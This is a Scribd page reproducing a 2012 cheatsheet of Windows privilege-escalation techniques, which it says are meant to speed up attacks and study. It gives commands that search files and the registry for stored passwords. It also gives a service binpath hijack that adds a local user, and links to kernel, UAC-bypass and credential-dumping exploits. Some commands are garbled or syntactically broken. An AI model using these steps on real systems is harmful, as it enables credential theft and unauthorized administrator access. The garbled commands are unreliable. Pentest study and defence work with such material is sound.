Scribd
Upload
94 views

Windows Privilege Escalation - A Cheatsheet

This document provides a summary of techniques for Windows privilege escalation, including exploiting stored credentials, registry queries, insecure services, and vulnerabilities. It lists tools from Sysinternals, Metasploit, and other sources to help automate various steps. The purpose is to help speed up attacks and study of privilege escalation methods.

Uploaded by

Aneudy Hernandez Peña
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
94 views

Windows Privilege Escalation - A Cheatsheet

This document provides a summary of techniques for Windows privilege escalation, including exploiting stored credentials, registry queries, insecure services, and vulnerabilities. It lists tools from Sysinternals, Metasploit, and other sources to help automate various steps. The purpose is to help speed up attacks and study of privilege escalation methods.

Uploaded by

Aneudy Hernandez Peña
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

Windows Privilege Escalation - a cheatsheet

This is a work in progress. Additions, suggestions and constructive feedback are welcome.
The purpose of these cheatsheets is to, essentially, save time during an attack and study session.

Last modified: Fri Jul 20 12:20:34 EST 2012

Stored credentials
Search for credentials within:

c:\unattend.xml
Unattend credentials are stored in base64 and can be decoded manually with base64:
user@host $ base64 -d  cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=

Metasploit Framework enum_unattend module and gather credentials module:


http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windo
ws/gather/enum_unattend.rb
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windo
ws/gather/credentials/gpp.rb

c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini

findstr /si password *.txt | *.xml | *.ini


findstr /si pass *.txt | *.xml | *.ini

Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
http://www.nirsoft.net/password_recovery_tools.html
Dumping cleartext credentials with mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html

------------------------------------------------------------------------------------------------------
Query the Windows Registry

VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows Autologin: 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
Putty clear text proxy credentials:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"

Search the registry - copy (pipe)  to the clipboard (optional)


reg query HKLM /f password /t REG_SZ /s  [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]

------------------------------------------------------------------------------------------------------
Insecure GUI apps 
running as SYSTEM that can open cmd.exe or directories "files, logfiles" etc.

------------------------------------------------------------------------------------------------------
Directory permissions
cacls
icacls

------------------------------------------------------------------------------------------------------
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027

Services pointing to writeable locations


*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?

sysinternals tools
accesschk.exe -uwcqv *

*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access

------------------------------------------------------------------------------------------------------
Change the upnp service binary
http://lanmaster53.com

sc qc upnphostsc config upnphost binpath= "net user <username> /add"


sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost

May work with other services if permissions permit


------------------------------------------------------------------------------------------------------
Vulnerability Privilege Escalation

Windows kernel privilege escalation


KiTrap0D 
http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

Tomcat Windows privilege escalation


http://www.abysssec.com/blog/2008/11/27/tomcat-jrun-privilege-escalation-windows

NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3


16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP
WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita
Tarakanov",windows,dos,0
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx

Service Tracing Key (MS10-059)


http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554

Registry Symlink Vuln (MS10-021)


No Public Exploit - VuPEN membership only

Ryujin - ADF.sys priv esc - ms11-080


http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/

UAC Bypass priv esc


http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info

Additional References and sources and other links:


Encyclopaedia of Windows Privilege escalation - Brett Moor
http://www.ruxcon.org.au/2011-talks/encyclopaedia-of-windows-privilege-escalation/

You might also like